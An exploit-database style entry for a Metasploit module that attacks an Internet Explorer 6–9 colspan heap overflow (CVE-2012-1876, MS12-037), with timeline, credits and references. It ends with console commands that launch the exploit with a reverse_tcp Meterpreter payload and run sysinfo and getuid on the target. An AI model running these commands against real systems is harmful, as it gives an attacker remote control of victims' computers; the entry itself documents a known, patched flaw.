Timeline :

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2012-03-14
Public release of the vulnerability the 2012-06-12
Details of the vulnerability provided by VUPEN the 2012-07-10
Metasploit PoC provided the 2012-07-31

PoC provided by :

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.

Commands :

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid